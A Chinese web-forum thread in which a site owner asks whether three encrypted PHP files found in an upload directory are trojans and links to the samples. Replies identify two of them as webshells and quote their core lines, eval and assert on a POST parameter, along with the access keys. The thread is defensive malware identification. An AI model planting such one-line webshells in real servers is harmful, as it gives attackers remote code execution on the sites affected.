服务器被上传了三个php文件

积木工具箱 · 发表于 2021-8-22 09:25

今天阿里云报警然后发现上传目录有三个php文件但是是加密的看不到内容有人能出来这个是不是木马文件吗
三个文件的下载地址 https://wwx.lanzoui.com/i1Z2csz6jpi

Fiora · 发表于 2021-8-22 14:50

本帖最后由 Fiora 于 2021-8-22 15:07 编辑

是不是混淆加密的

Prajna · 发表于 2021-8-22 14:53

混淆加密的看不了

jiujiukeji · 发表于 2021-8-22 19:02

Adobe ImageReady

lions · 发表于 2021-8-23 08:48

这种一般就是木马文件。干掉

ahov · 发表于 2021-8-23 09:14

894e64ff4b376dc0f87b7418330ce10c.php - jpg-php-embed webshell
aa4cde8283e6d3a7030542c059165c10.php - mp3音频白文件
f3c75608caf760be8b0ebcd0f35845b5.php - webshell

flyjerry · 发表于 2021-9-15 12:25

还有这样的病毒？

hc3w · 发表于 2021-9-15 22:15

f3c75608caf760be8b0ebcd0f35845b5.php
关键是：eval($_POST[1]); ，菜刀密钥是1

894e64ff4b376dc0f87b7418330ce10c.php
代码是：assert($_POST['4']); ，密钥是4

aa4cde8283e6d3a7030542c059165c10.php
未发现有效的PHP 代码。

qhdvbnk · 发表于 2021-10-24 14:27

缓存目录的PHP能有啥好东西呢

帐号		自动登录	找回密码
密码			注册[Register]

服务器被上传了三个php文件

个人中心